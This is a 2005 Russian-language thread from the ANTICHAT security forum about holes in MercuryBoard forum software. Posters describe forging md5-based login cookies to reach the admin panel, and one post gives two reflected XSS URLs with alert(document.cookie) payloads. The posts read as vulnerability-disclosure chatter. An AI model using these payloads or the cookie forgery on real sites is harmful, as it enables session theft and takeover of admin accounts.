ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.04.2005, 10:31
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Нет, никакого двойного хеш. не используется.
Все очень просто... md5 хеш и номер юзера в таблице
Можно подделать куки и зайти в админку
 
Ответить с цитированием

  #12  
Старый 17.04.2005, 10:32
White Jordan
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

2 Pink-Panther и KEZ,

А вам IPB не интересно взламывать?
 
Ответить с цитированием

  #13  
Старый 17.04.2005, 10:47
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

А там уже все взломано (в плане Xss)
 
Ответить с цитированием

  #14  
Старый 17.04.2005, 10:53
White Jordan
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

А те баги которые Я нашол вы не смотрели?
 
Ответить с цитированием

  #15  
Старый 19.04.2005, 20:29
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Вот ещё парочка:
Код:
http://site/mercuryboard/index.php?a=topic&t="><script>alert(document.cookie)</script>
Код:
http://site/mercuryboard/index.php?a=cp&s=addsub&type="><script>alert(document.cookie)</script>topic&item=3
Оставляю только те, которых нет на секлабе.
 
Ответить с цитированием

  #16  
Старый 24.04.2005, 05:24
White Jordan
Banned
Регистрация: 21.04.2005
Сообщений: 5
Провел на форуме:
0

Репутация: -2
По умолчанию

Если честно, то просто позорно в таких форумах находить баги. Равно сильно у ребёнка отнять конфетку.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ